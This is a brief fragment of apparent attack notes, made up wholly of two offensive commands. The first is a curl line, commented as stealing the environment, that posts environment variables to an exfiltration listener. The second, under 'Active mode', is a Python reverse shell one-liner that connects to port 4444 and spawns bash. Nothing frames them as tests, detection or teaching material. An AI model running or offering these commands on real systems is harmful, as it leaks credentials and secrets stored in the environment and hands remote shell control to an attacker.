# This line steals the environment and sends it to your listener
curl -X POST -d "$(env | head -n 20)" http://localhost:8080/exfil/env

## Active mode
 `python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")' &`
